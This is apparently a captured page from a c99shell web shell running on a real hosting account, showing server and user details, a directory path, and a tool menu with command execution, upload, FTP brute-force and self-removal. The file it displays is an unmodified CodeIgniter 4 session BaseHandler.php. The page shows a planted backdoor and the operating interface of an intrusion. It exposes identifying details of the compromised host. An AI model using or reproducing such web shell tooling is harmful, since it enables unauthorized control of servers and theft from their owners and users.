smsonayla.org - c99shell

!C99Shell v.2.1 [PHP 7 Update] [1.12.2019]!

Software: LiteSpeed. PHP/7.4.33 

uname -a: Linux server704.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13
UTC 2025 x86_64
 

uid=1309(necipbey) gid=1314(necipbey) groups=1314(necipbey) 

Safe-mode: OFF (not secure)

/home/necipbey/public_html/system/Session/Handlers/   drwxr-xr-x
Free 3432.42 GB of 4265.01 GB (80.48%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     BaseHandler.php (3.5 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/**
 * This file is part of CodeIgniter 4 framework.
 *
 * (c) CodeIgniter Foundation <admin@codeigniter.com>
 *
 * For the full copyright and license information, please view
 * the LICENSE file that was distributed with this source code.
 */

namespace CodeIgniter\Session\Handlers;

use 
Config\App as AppConfig;
use 
Psr\Log\LoggerAwareTrait;
use 
SessionHandlerInterface;

/**
 * Base class for session handling
 */
abstract class BaseHandler implements SessionHandlerInterface
{
    use 
LoggerAwareTrait;

    
/**
     * The Data fingerprint.
     *
     * @var string
     */
    
protected $fingerprint;

    
/**
     * Lock placeholder.
     *
     * @var mixed
     */
    
protected $lock false;

    
/**
     * Cookie prefix
     *
     * @var string
     */
    
protected $cookiePrefix '';

    
/**
     * Cookie domain
     *
     * @var string
     */
    
protected $cookieDomain '';

    
/**
     * Cookie path
     *
     * @var string
     */
    
protected $cookiePath '/';

    
/**
     * Cookie secure?
     *
     * @var bool
     */
    
protected $cookieSecure false;

    
/**
     * Cookie name to use
     *
     * @var string
     */
    
protected $cookieName;

    
/**
     * Match IP addresses for cookies?
     *
     * @var bool
     */
    
protected $matchIP false;

    
/**
     * Current session ID
     *
     * @var string|null
     */
    
protected $sessionID;

    
/**
     * The 'save path' for the session
     * varies between
     *
     * @var array|string
     */
    
protected $savePath;

    
/**
     * User's IP address.
     *
     * @var string
     */
    
protected $ipAddress;

    public function 
__construct(AppConfig $configstring $ipAddress)
    {
        
$this->cookiePrefix $config->cookiePrefix;
        
$this->cookieDomain $config->cookieDomain;
        
$this->cookiePath   $config->cookiePath;
        
$this->cookieSecure $config->cookieSecure;
        
$this->cookieName   $config->sessionCookieName;
        
$this->matchIP      $config->sessionMatchIP;
        
$this->savePath     $config->sessionSavePath;
        
$this->ipAddress    $ipAddress;
    }

    
/**
     * Internal method to force removal of a cookie by the client
     * when session_destroy() is called.
     */
    
protected function destroyCookie(): bool
    
{
        return 
setcookie(
            
$this->cookieName,
            
'',
            [
'expires' => 1'path' => $this->cookiePath'domain' => $this->cookieDomain'secure' => $this->cookieSecure'httponly' => true]
        );
    }

    
/**
     * A dummy method allowing drivers with no locking functionality
     * (databases other than PostgreSQL and MySQL) to act as if they
     * do acquire a lock.
     */
    
protected function lockSession(string $sessionID): bool
    
{
        
$this->lock true;

        return 
true;
    }

    
/**
     * Releases the lock, if any.
     */
    
protected function releaseLock(): bool
    
{
        
$this->lock false;

        return 
true;
    }

    
/**
     * Drivers other than the 'files' one don't (need to) use the
     * session.save_path INI setting, but that leads to confusing
     * error messages emitted by PHP when open() or write() fail,
     * as the message contains session.save_path ...
     *
     * To work around the problem, the drivers will call this method
     * so that the INI is set just in time for the error message to
     * be properly generated.
     */
    
protected function fail(): bool
    
{
        
ini_set('session.save_path'$this->savePath);

        return 
false;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v.2.1 [PHP 7 Update] [1.12.2019] maintained by KaizenLouie and updated by cermmik | C99Shell Github (MySQL update) | Generation time: 0.0056 ]--